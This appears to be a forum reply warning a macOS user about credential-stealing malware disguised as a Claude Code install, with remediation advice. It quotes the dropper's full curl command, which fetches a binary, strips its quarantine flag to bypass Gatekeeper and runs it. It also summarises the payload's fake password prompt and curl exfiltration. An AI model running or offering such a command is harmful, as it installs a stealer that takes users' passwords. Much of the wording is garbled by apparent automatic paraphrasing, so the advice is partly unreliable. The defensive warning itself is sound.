It is a extremely obfuscated (and clearly malicious) shell command that finally downloads and executes a binary payload with the identify helper, bypassing Gatekeeper. The final stage of the drop is that this:
curl -o /tmp/helper https://rvdownloads.com/usbfix/replace && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
Two of the AV engines on the VirusTotal web site flag the payload as a credential stealer:
Avast MacOS:Stealer-HH
ESET-NOD32 OSX/PSW.Agent.GR Trojan
For extra info, see:
Malware marketing campaign impersonating Claude Code set up through Google (github.com).
The linked web page describes what appears to be a barely completely different variant:
The decrypted payload executes two
osascriptprocesses that:
- Request TCC AppleEvents permission for Terminal
- Browse /Purposes/ through Finder (
fndr,gstl) for reconnaissance- Conceal the Terminal window (
core,setd→ Terminal)- Collect system information through a number of
do shell scriptcalls- Write a machine fingerprint hash to
~/.username- Show a pretend password dialog (
syso,dlog) to social-engineer the
person’s macOS password- Write the captured password to
~/.move- Create momentary staging information, learn system knowledge
- Exfiltrate collected knowledge through
curlagain towoupp.com- Clear up momentary information
It’s important to assume that each one your personal knowledge is compromised.
The one mitigating characteristic of this malware, not less than within the variant analyzed by Anthropic on GitHub, is that it has no persistence mechanism. It is apparently one and executed. However I am not a safety researcher and I did not disassemble the payload or run it to see what it does. At a minimal, it is best to open System Settings > Normal > Login Gadgets & Extensions and ensure there may be nothing there that you do not acknowledge, even when it appears to be like harmless. If there may be, please report it right here.
Waste no time altering all vital passwords. Take no matter precautions you deem obligatory towards id theft. Count on follow-on assaults trying to defeat two-factor authentication.
For the shape these follow-on assaults might take, see:
How Attackers Bypass Two-factor Authentication (2FA) (zitadel.com).
Even when the attacker has already obtained your person credentials, they nonetheless want to accumulate the extra authentication issue to realize entry to your account. To obtain the required code from the sufferer, the felony would possibly name, textual content, or electronic mail them with a seemingly believable justification. After all, they may possible accomplish that disguised as a trusted entity, similar to Google or Apple, to attenuate suspicion. Be sure to all the time double-check the sender’s id, in addition to the content material of the textual content message, to keep away from falling sufferer to a hacking try.
